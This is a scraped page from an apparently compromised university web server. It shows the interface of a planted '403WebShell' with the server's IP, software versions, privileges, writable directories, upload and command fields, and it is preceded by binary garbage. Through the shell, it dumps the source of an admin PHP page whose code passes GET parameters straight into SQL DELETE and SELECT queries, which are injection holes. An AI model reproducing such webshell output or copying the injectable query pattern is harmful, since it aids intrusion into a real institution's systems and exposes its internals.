h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/regisjob/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/regisjob/admin/list_regis_money.php
<?php session_start();?>
<?php 
if (!$_SESSION["UserID"]){  //check session
 session_destroy();

	  Header("Location: index1.php"); //ไม่พบผู้ใช้กระโดดกลับไปหน้า login form 
 
}else{?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
		<meta name="description" content="">
		<meta name="author" content="">
		<title>มหาวิทยาลัยราชภัฎสงขลา</title>  
		<script src="../js/jquery.js"></script>		
		<script src="../js/bootstrap.min.js"></script>
		<script src="../js/bootbox.min.js"></script>
        
        
        
		<link rel="stylesheet" href="../css/bootstrap.min.css">
        <link href="../landingwork_files/style.css" rel="stylesheet">
            <link rel="canonical" href="https://getbootstrap.com/docs/5.1/examples/headers/">

		<script type="text/javascript"> 
			function showSlidingDiv(i){
				var str="#slidingDiv"+i;
				$(str).animate({"height": "toggle"}, { duration: 1000 });
			}
		</script>

<title>มหาวิทยาลัยราชภัฎสงขลา</title>

	
<style type="text/css">
		
    /*header area*/
   /*header area*/
    .top-header{
        /*background: #fff !important;*/
        position: static;
        width: 100%;
        z-index: 99999;
        /* background-image: url('assets/img/topHeaderrgb(89,172,255),rgb(89,172,255).jpg'); */
        height: 25%;
        background-image: linear-gradient(rgb(89,172,255), rgb(89,172,255));
        
    }
    .footer {
        height: 10%;
        display: block;
        background-color: lightblue;
        text-align: center;
        
        /* background-image: url('assets/img/footerrgb(89,172,255),rgb(89,172,255).jpg'); */
        background-image: linear-gradient(rgb(89,172,255), rgb(89,172,255));
        width:100%; 
        left:0; 
        bottom:0;
    }
    .list-group-item.active, 
    .list-group-item.active:hover, 
    .list-group-item.active:focus {
        z-index: 2;
        color: #fff;
        background-color: #82b8e6;
        border-color: #337ab7;
    }
    .menulist .active {
        background: #63aff1;
        border: #000000;

    }
    .menulist li:hover{
            background: #bdd5ea;

    }
    .panel-default > .panel-heading {
        color: #fff;
        background-color: #63aff1;
        font-size: 25px;
    /* border: 1px solid ;
        */
    }
    .panel-default > .panel-heading2 {
        color: #FFFFFF;
        background-color: #CC0000;
        font-size: 28px;
    /* border: 1px solid ;
        */
    }


    .imgHead{
        height: 30%;
        width: 30%;
    }

</style>
<!-- Custom styles for this template -->
<?php //CONNECT
//$conn=mysqli_connect("localhost","root","","jobregis");
//mysqli_query($conn, "SET NAMES UTF8");


// Create connection
include("../include/connect.php");
?>

<?php
 if(isset($_GET['ckde'])==1){
		echo $login_id=$_GET['loginid'];
		
			$depee=mysqli_query($conn,"DELETE FROM joblogin WHERE login_id='$login_id'");
		if($depee){
				echo "<script language=\"JavaScript\">";
				echo "alert('ลบข้อมูลสำเร็จ');";
				echo "</script>";

		}else{
				echo "<script language=\"JavaScript\">";
				echo "alert('ไม่สามารถลบข้อมูลได้');";
				echo "</script>";
			 } //if(mysql_query($sqlcal)){	
}

?>


 </head>
 <body>
 
 
<?php

//-------------------------ฟังก์ชันดึงข้อมูลสำหรับวนloop----------------------//
function records($conn,$sql){  //ฟังก์ชันดึงข้อมูลสำหรับวนloop
	unset($data);
	$result=mysqli_query($conn,$sql); 
	$rows=mysqli_num_rows($result); 
	for($i=0;$i<$rows;$i++){
	  //mysql_data_seek($result,$i);
	  $data[$i]=mysqli_fetch_array($result,MYSQLI_ASSOC);
	}
	return $data;
}

$data=records($conn,"SELECT * FROM joblogin ORDER BY login_id asc");
?>
<?php
  $sql="SELECT * FROM jobposition WHERE job_id='".$_GET['job_id']."'";
 
                     $result = mysqli_query($conn,$sql);
					 $row1 = mysqli_fetch_array($result);
					 $c=$row1['job_name'];

?>
 
 <?php include("head.php");?>
 <!--layout menu -->
		<div class="container" style="margin-bottom:40px;">
			<div class="row" style="padding-top: 20px;">
				<div class="col-md-12 bg-light">
					<!-- information -->
						<div class="bs-callout2 bg-body">
							<center>
 
 <!-- เนื้อหา --->
 <div class="container">
  <main>
    <div class="py-8 text-center">
      <img class="d-block mx-auto mb-4" src="../pic/calen.jpg" alt="" width="72" height="57">
      <h2>รายชื่อผู้สมัคร ตำแหน่ง <?php echo $c;?></h2>
      <h2 style="color:#900"> (ตรวจสอบหลักฐานการจ่ายเงิน)</h2>
    </div>
</div>
<table>
<nav class="navbar navbar-light bg-light">
  	<div class="row col-6">
     <form class="form-inline">
        <div class="col-1">  
         <a href="report_excel_regis.php?job_id=<?php echo $row1['job_id'];?>" role="button">    
      <img src="../pic/HP-Printer-icon.png" alt="" width="72" height="57"></a>
        </div>
     </form>  
    </div>
</nav>
</table>

            <table class="table table-hover table-bordered">
                      <tr class="table-info">
                          <td class="table-primary fs-6 text-center">ลำดับ</td>
                          <td class="table-primary fs-6 text-center">ชื่อ-สกุล</td>
                          <td class="table-primary fs-6 text-center">สถานะ</td>
                         
                    </tr>
                    <?php
						for($i=0;$i<count($data);$i++){
							$b=$i+1;
					 ?>
                    <tr>
                      <td class="table-info fs-6 text-center"><?php echo $b;?></td>
                      <td class="table-info fs-6 text-center"><?php echo $data[$i]['login_name']." ".$data[$i]['login_lastname'];?></td>
                       <td class="table-info fs-6 text-center">
					   <?php 
					   if($data[$i]['login_type']=="a"){
						   echo "อาจารย์";
					  	}
						if($data[$i]['login_type']=="p"){
						   echo "เจ้าหน้าที่";
						}
                       ?>
                       </td>
                    </tr>
                    <?php } ?>
            </table>
<!---จบเนื้อหา -->  
 	</center>
						</div>
                                    
				</div>
				<br>
				<div class="col-md-9 col-md-offset-3" style="align:left; padding-top: 5px;">
				</div>
			</div>
		</div>
 
 
 
<?php include("foot.php");?>

</div>
    <script src="../assets/dist/js/bootstrap.bundle.min.js"></script>



  </body>
</html>
<?php } ?>

Youez - 2016 - github.com/yon3zu
LinuXploit